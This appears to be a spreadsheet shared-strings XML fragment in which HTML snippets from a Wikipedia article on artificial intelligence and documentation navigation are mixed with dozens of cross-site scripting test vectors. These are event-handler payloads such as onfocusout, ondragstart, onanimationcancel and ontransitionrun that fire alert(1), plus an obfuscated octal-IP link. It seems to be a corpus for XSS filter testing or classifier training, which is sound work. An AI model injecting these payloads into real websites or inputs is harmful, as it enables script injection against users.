  <si>
    <t>&lt;div onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/div&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;dd draggable="true" ondragleave="alert(1)"&gt;test&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;link draggable="true" ondragstart="alert(1)"&gt;test&lt;/link&gt;</t>
  </si>
  <si>
    <t>&lt;body onkeypress="alert(1)" contenteditable&gt;test&lt;/body&gt;</t>
  </si>
  <si>
    <t>&lt;progress onpaste="alert(1)" contenteditable&gt;test&lt;/progress&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h2&gt;&lt;span class="mw-headline" id="Applications"&gt;Applications&lt;span id="Goals"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="magnify"&gt;&lt;a href="/wiki/File:Artificial_neural_network.svg" class="internal" title="Enlarge"&gt; &lt;/a&gt; &lt;/div&gt;A neural network is an interconnected group of nodes, akin to the vast network of &lt;a href="/wiki/Neuron" title="Neuron"&gt;neurons &lt;/a&gt; in the &lt;a href="/wiki/Human_brain" title="Human brain"&gt;human brain &lt;/a&gt;. &lt;/div&gt; &lt;/div&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;bgsound draggable="true" ondragleave="alert(1)"&gt;test&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t>&lt;ruby id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/ruby&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">        </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;AI textbooks </t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:1%"&gt;&lt;a href="/wiki/Cyberneticist" title="Cyberneticist"&gt;Cyberneticians &lt;/a&gt; &lt;/th&gt;&lt;td class="navbox-list navbox-even hlist" style="text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/List_of_artificial_intelligence_projects" title="List of artificial intelligence projects"&gt;Projects &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Situation_calculus" title="Situation calculus"&gt;Situation calculus &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;command onpointerup=alert(1)&gt;XSS&lt;/command&gt;</t>
  </si>
  <si>
    <t>&lt;blink id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/blink&gt;</t>
  </si>
  <si>
    <t>&lt;input onpointerout=alert(1)&gt;XSS&lt;/input&gt;</t>
  </si>
  <si>
    <t>&lt;mark onmousedown="alert(1)"&gt;test&lt;/mark&gt;</t>
  </si>
  <si>
    <t>&lt;tr onmousedown="alert(1)"&gt;test&lt;/tr&gt;</t>
  </si>
  <si>
    <t>&lt;col onpointerenter=alert(1)&gt;XSS&lt;/col&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Thought-capable artificial beings appeared as storytelling devices since antiquity,&lt;sup id="cite_ref-AI_in_myth_26-1" class="reference"&gt;&lt;a href="#cite_note-AI_in_myth-26"&gt;&amp;#91;26&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;strike draggable="true" ondragstart="alert(1)"&gt;test&lt;/strike&gt;</t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="topics/exceptions.html"&gt;Exceptions&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;keygen onpointerover=alert(1)&gt;XSS&lt;/keygen&gt;</t>
  </si>
  <si>
    <t>&lt;b onbeforecopy="alert(1)" contenteditable&gt;test&lt;/b&gt;</t>
  </si>
  <si>
    <t>&lt;rtc onbeforecopy="alert(1)" contenteditable&gt;test&lt;/rtc&gt;</t>
  </si>
  <si>
    <t>&lt;tt onkeyup="alert(1)" contenteditable&gt;test&lt;/tt&gt;</t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="topics/logging.html"&gt;&lt;span class="doc"&gt;Logging</t>
  </si>
  <si>
    <t>&lt;option onmouseout="alert(1)"&gt;test&lt;/option&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Computational_neuroscience" title="Computational neuroscience"&gt;Computational neuroscience &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:7.5em"&gt;Late modern &lt;/th&gt;&lt;td class="navbox-list navbox-even" style="text-align:left;border-left-width:2px;border-left-style:solid;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;track draggable="true" ondragenter="alert(1)"&gt;test&lt;/track&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFNRC1999"&gt;NRC 1999 &lt;/a&gt;, pp.&amp;#160;200–201 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;code draggable="true" ondragstart="alert(1)"&gt;test&lt;/code&gt;</t>
  </si>
  <si>
    <t>&lt;frameset oncopy="alert(1)" contenteditable&gt;test&lt;/frameset&gt;</t>
  </si>
  <si>
    <t>&lt;form id=x tabindex=1 onfocus=alert(1)&gt;&lt;/form&gt;</t>
  </si>
  <si>
    <t>&lt;td onkeyup="alert(1)" contenteditable&gt;test&lt;/td&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Psychological_evidence_of_sub-symbolic_reasoning-90"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Psychological_evidence_of_sub-symbolic_reasoning_90-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;span onpointermove=alert(1)&gt;XSS&lt;/span&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Library_classification" title="Library classification"&gt;Library classification &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;&lt;span class="mw-headline" id="Cybersecurity"&gt;Cybersecurity </t>
  </si>
  <si>
    <t>&lt;dfn onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/dfn&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;abbr id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/abbr&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;bdi id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/bdi&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-49"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-49"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;In classical planning problems, the agent can assume that it is the only system acting in the world, allowing the agent to be certain of the consequences of its actions.&lt;sup id="cite_ref-Classical_planning_112-0" class="reference"&gt;&lt;a href="#cite_note-Classical_planning-112"&gt;&amp;#91;109&amp;#93; &lt;/a&gt; &lt;/sup&gt; However, if the agent is not the only actor, then it requires that the agent can reason under uncertainty. This calls for an agent that can not only assess its environment and make predictions, but also evaluate its predictions and adapt based on its assessment.&lt;sup id="cite_ref-Non-deterministic_planning_113-0" class="reference"&gt;&lt;a href="#cite_note-Non-deterministic_planning-113"&gt;&amp;#91;110&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;samp onmouseout="alert(1)"&gt;test&lt;/samp&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;summary id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/summary&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Computing_platform" title="Computing platform"&gt;Computing platform &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;div style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Audio-Animatronics" title="Audio-Animatronics"&gt;Audio-Animatronics &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;img id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/img&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;(2007) &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/William_Grey_Walter" title="William Grey Walter"&gt;William Grey Walter &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;tt onpointerenter=alert(1)&gt;XSS&lt;/tt&gt;</t>
  </si>
  <si>
    <t>&lt;option onkeyup="alert(1)" contenteditable&gt;test&lt;/option&gt;</t>
  </si>
  <si>
    <t>&lt;section onkeyup="alert(1)" contenteditable&gt;test&lt;/section&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=McKinsey+%26+Company&amp;amp;rft.atitle=Ask+the+AI+experts%3A+What%27s+driving+today%27s+progress+in+AI%3F&amp;amp;rft_id=https%3A%2F%2Fwww.mckinsey.com%2Fbusiness-functions%2Fmckinsey-analytics%2Four-insights%2Fask-the-ai-experts-whats-driving-todays-progress-in-ai&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;plaintext draggable="true" ondrag="alert(1)"&gt;test&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;param id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/param&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=unknown&amp;amp;rft.btitle=Unhuman%3A+Art+in+the+Age+of+AI+%E2%80%93+State+Festival&amp;amp;rft.pub=Statefestival.org&amp;amp;rft_id=https%3A%2F%2Fwww.statefestival.org%2Fprogram%2F2017%2Funhuman-art-in-the-age-of-ai&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Cybernetics_in_the_Soviet_Union" title="Cybernetics in the Soviet Union"&gt;Cybernetics in the Soviet Union &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;A classifier can be trained in various ways; there are many statistical and &lt;a href="/wiki/Machine_learning" title="Machine learning"&gt;machine learning &lt;/a&gt; approaches. The &lt;a href="/wiki/Decision_tree_learning" title="Decision tree learning"&gt;decision tree &lt;/a&gt;&lt;sup id="cite_ref-Decision_tree_217-0" class="reference"&gt;&lt;a href="#cite_note-Decision_tree-217"&gt;&amp;#91;211&amp;#93; &lt;/a&gt; &lt;/sup&gt; is perhaps the most widely used machine learning algorithm.&lt;sup id="cite_ref-FOOTNOTEDomingos201588_218-0" class="reference"&gt;&lt;a href="#cite_note-FOOTNOTEDomingos201588-218"&gt;&amp;#91;212&amp;#93; &lt;/a&gt; &lt;/sup&gt; Other widely used classifiers are the &lt;a href="/wiki/Artificial_neural_network" title="Artificial neural network"&gt;neural network &lt;/a&gt;,&lt;sup id="cite_ref-Neural_networks_219-0" class="reference"&gt;&lt;a href="#cite_note-Neural_networks-219"&gt;&amp;#91;213&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;output onpointerout=alert(1)&gt;XSS&lt;/output&gt;</t>
  </si>
  <si>
    <t>&lt;blockquote onmouseout="alert(1)"&gt;test&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;element id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/element&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;a id=x style="transition:transform 									2s" ontransitionrun=alert(1)&gt;&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;time onpointerover=alert(1)&gt;XSS&lt;/time&gt;</t>
  </si>
  <si>
    <t>&lt;head onmouseleave="alert(1)"&gt;test&lt;/head&gt;</t>
  </si>
  <si>
    <t>&lt;content onbeforecopy="alert(1)" contenteditable&gt;test&lt;/content&gt;</t>
  </si>
  <si>
    <t>&lt;listing onmousemove="alert(1)"&gt;test&lt;/listing&gt;</t>
  </si>
  <si>
    <t>&lt;input2 onpointerenter=alert(1)&gt;XSS&lt;/input2&gt;</t>
  </si>
  <si>
    <t>x000003C</t>
  </si>
  <si>
    <t>&lt;small ondblclick="alert(1)"&gt;test&lt;/small&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Nature2017-258"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Nature2017_258-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;i onpointerover=alert(1)&gt;XSS&lt;/i&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;A very different kind of search came to prominence in the 1990s, based on the mathematical theory of &lt;a href="/wiki/Optimization_(mathematics)" class="mw-redirect" title="Optimization (mathematics)"&gt;optimization &lt;/a&gt;. For many problems, it is possible to begin the search with some form of a guess and then refine the guess incrementally until no more refinements can be made. These algorithms can be visualized as blind &lt;a href="/wiki/Hill_climbing" title="Hill climbing"&gt;hill climbing &lt;/a&gt;: we begin the search at a random point on the landscape, and then, by jumps or steps, we keep moving our guess uphill, until we reach the top. Other optimization algorithms are &lt;a href="/wiki/Simulated_annealing" title="Simulated annealing"&gt;simulated annealing &lt;/a&gt;, &lt;a href="/wiki/Beam_search" title="Beam search"&gt;beam search &lt;/a&gt; and &lt;a href="/wiki/Random_optimization" title="Random optimization"&gt;random optimization &lt;/a&gt;.&lt;sup id="cite_ref-Optimization_search_190-0" class="reference"&gt;&lt;a href="#cite_note-Optimization_search-190"&gt;&amp;#91;186&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;basefont draggable="true" ondrag="alert(1)"&gt;test&lt;/basefont&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;basefont style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/basefont&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;abbr onload=alert(1)&gt;&lt;/abbr&gt;</t>
  </si>
  <si>
    <t>&lt;noframes onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/noframes&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;meter onpointerout=alert(1)&gt;XSS&lt;/meter&gt;</t>
  </si>
  <si>
    <t>&lt;link rel="shortcut icon" href="/static/favicon/wikipedia.ico"/&gt;</t>
  </si>
  <si>
    <t>&lt;link onpointermove=alert(1)&gt;XSS&lt;/link&gt;</t>
  </si>
  <si>
    <t>&lt;option id=x tabindex=1 onactivate=alert(1)&gt;&lt;/option&gt;</t>
  </si>
  <si>
    <t>&lt;applet oncopy="alert(1)" contenteditable&gt;test&lt;/applet&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;animatetransform onend=alert(1) attributeName=transform dur=1s&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-FOOTNOTERussellNorvig20091-289"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-FOOTNOTERussellNorvig20091_289-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-FOOTNOTERussellNorvig20091_289-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;&lt;span class="mw-headline" id="Planning"&gt;Planning </t>
  </si>
  <si>
    <t>&lt;a onmouseout="alert(1)"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Jason_Jixuan_Hu" title="Jason Jixuan Hu"&gt;Jason Jixuan Hu &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">  &lt;div class="rst-versions" data-toggle="rst-versions" role="note" aria-label="versions"&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;br style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/br&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFPooleMackworthGoebel1998"&gt;Poole, Mackworth &amp;amp; Goebel 1998 &lt;/a&gt;, pp.&amp;#160;345–395, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Operating_system" title="Operating system"&gt;Operating system &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;A HREF="http://0102.0146.0007.00000223/"&gt;&lt;/A&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFHowe1994" class="citation web"&gt;Howe, J. (November 1994). &lt;a rel="nofollow" class="external text" href="http://www.inf.ed.ac.uk/about/AIhistory.html"&gt;"Artificial Intelligence at Edinburgh University: a Perspective" &lt;/a&gt;&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;30 August </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;fieldset id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t>&lt;menu oncut="alert(1)" contenteditable&gt;test&lt;/menu&gt;</t>
  </si>
  <si>
    <t>&lt;base onkeypress="alert(1)" contenteditable&gt;test&lt;/base&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Multi-agent_planning-114"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Multi-agent_planning_114-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Android_(robot)" title="Android (robot)"&gt;Android &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, p.&amp;#160;22 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;blockquote onpointerleave=alert(1)&gt;XSS&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;menu onmouseover="alert(1)"&gt;test&lt;/menu&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Glossary_of_artificial_intelligence" title="Glossary of artificial intelligence"&gt;Glossary &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt; &lt;/td&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;Croft, Jane (2 May 2019). &lt;a rel="nofollow" class="external text" href="https://www.ft.com/content/fef40df0-4a6a-11e9-bde6-79eaea5acb64"&gt;"AI learns to read Korean, so you don't have to" &lt;/a&gt;. &lt;i&gt;Financial Times &lt;/i&gt;&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;19 December </t>
  </si>
  <si>
    <t>&lt;object draggable="true" ondrag="alert(1)"&gt;test&lt;/object&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-6"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-6"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;i oncopy="alert(1)" contenteditable&gt;test&lt;/i&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;bgsound style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t>&lt;dl&gt;&lt;dt&gt;&lt;i&gt;The &lt;a href="/wiki/Dartmouth_Workshop" class="mw-redirect" title="Dartmouth Workshop"&gt;Dartmouth proposal &lt;/a&gt; &lt;/i&gt; &lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;img2 onpointerleave=alert(1)&gt;XSS&lt;/img2&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;wbr id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/wbr&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;command id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/command&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;sub id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/sub&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-284"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-284"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:1%"&gt;&lt;a href="/wiki/Theory_of_computation" title="Theory of computation"&gt;Theory of computation &lt;/a&gt; &lt;/th&gt;&lt;td class="navbox-list navbox-odd" style="text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;input style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/input&gt;</t>
  </si>
  <si>
    <t>&lt;legend onkeyup="alert(1)" contenteditable&gt;test&lt;/legend&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;In 2019, the tech city of Bengaluru in India is set to deploy AI managed traffic signal systems across the 387 traffic signals in the city. This system will involve use of cameras to ascertain traffic density and accordingly calculate the time needed to clear the traffic volume which will determine the signal duration for vehicular traffic across streets.&lt;sup id="cite_ref-327" class="reference"&gt;&lt;a href="#cite_note-327"&gt;&amp;#91;316&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;thead onkeypress="alert(1)" contenteditable&gt;test&lt;/thead&gt;</t>
  </si>
  <si>
    <t>&lt;link onpointerout=alert(1)&gt;XSS&lt;/link&gt;</t>
  </si>
  <si>
    <t>&lt;summary onpointerout=alert(1)&gt;XSS&lt;/summary&gt;</t>
  </si>
  <si>
    <t>&lt;input4 onpointerup=alert(1)&gt;XSS&lt;/input4&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFPooleMackworthGoebel1998"&gt;Poole, Mackworth &amp;amp; Goebel 1998 &lt;/a&gt;, pp.&amp;#160;275–277 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;details onload=alert(1)&gt;&lt;/details&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFACM1998"&gt;ACM 1998 &lt;/a&gt;, I.2.6, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;acronym id=x tabindex=1 onactivate=alert(1)&gt;&lt;/acronym&gt;</t>
  </si>
  <si>
    <t>&lt;select oncontextmenu="alert(1)"&gt;test&lt;/select&gt;</t>
  </si>
  <si>
    <t>&lt;bdi onmouseover="alert(1)"&gt;test&lt;/bdi&gt;</t>
  </si>
  <si>
    <t>&lt;meter id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/meter&gt;</t>
  </si>
  <si>
    <t>&lt;button id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/button&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;&lt;a rel="nofollow" class="external text" href="https://www.mak.at/en/program/exhibitions/uncanny_values"&gt;Retrieved October 2019 "MAK Wien - MAK Museum Wien" &lt;/a&gt;&lt;span class="cs1-visible-error error citation-comment"&gt; Check &lt;code class="cs1-code"&gt;&amp;#124;url= &lt;/code&gt; value (&lt;a href="/wiki/Help:CS1_errors#bad_url" title="Help:CS1 errors"&gt;help &lt;/a&gt;) </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;tt ondragover=alert(1) contenteditable&gt;drop here&lt;/tt&gt;</t>
  </si>
  <si>
    <t>&lt;keygen draggable="true" ondragenter="alert(1)"&gt;test&lt;/keygen&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;rp ondragover=alert(1) contenteditable&gt;drop here&lt;/rp&gt;</t>
  </si>
  <si>
    <t>&lt;video id=x controls onfocusin=alert(1)&gt;&lt;source src="validvideo.mp4" type=video/mp4&gt;&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;image onbeforepaste="alert(1)" contenteditable&gt;test&lt;/image&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Karl_Popper" title="Karl Popper"&gt;Karl Popper &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;output onbeforepaste="alert(1)" contenteditable&gt;test&lt;/output&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-308"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-308"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;figcaption onbeforecut="alert(1)" contenteditable&gt;test&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t>&lt;s onpointermove=alert(1)&gt;XSS&lt;/s&gt;</t>
  </si>
  <si>
    <t>&lt;slot id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/slot&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-FOOTNOTEDomingos2015Chapter_4-234"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-FOOTNOTEDomingos2015Chapter_4_234-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">    &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;b id=x tabindex=1 onactivate=alert(1)&gt;&lt;/b&gt;</t>
  </si>
  <si>
    <t>&lt;link onmousedown="alert(1)"&gt;test&lt;/link&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;multicol id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/multicol&gt;</t>
  </si>
  <si>
    <t>&lt;frameset oncut="alert(1)" contenteditable&gt;test&lt;/frameset&gt;</t>
  </si>
  <si>
    <t>&lt;meter draggable="true" ondragenter="alert(1)"&gt;test&lt;/meter&gt;</t>
  </si>
  <si>
    <t>&lt;command onpointerdown=alert(1)&gt;XSS&lt;/command&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-61"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-61"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;html onclick="alert(1)"&gt;test&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;meta draggable="true" ondragstart="alert(1)"&gt;test&lt;/meta&gt;</t>
  </si>
  <si>
    <t>&lt;font onpointerover=alert(1)&gt;XSS&lt;/font&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;Yannakakis, G. N. (2012, May). Game AI revisited. In Proceedings of the 9th conference on Computing Frontiers (pp. 285–292). ACM. </t>
  </si>
  <si>
    <t>&lt;template draggable="true" ondragend="alert(1)"&gt;test&lt;/template&gt;</t>
  </si>
  <si>
    <t>&lt;img2 onpointerdown=alert(1)&gt;XSS&lt;/img2&gt;</t>
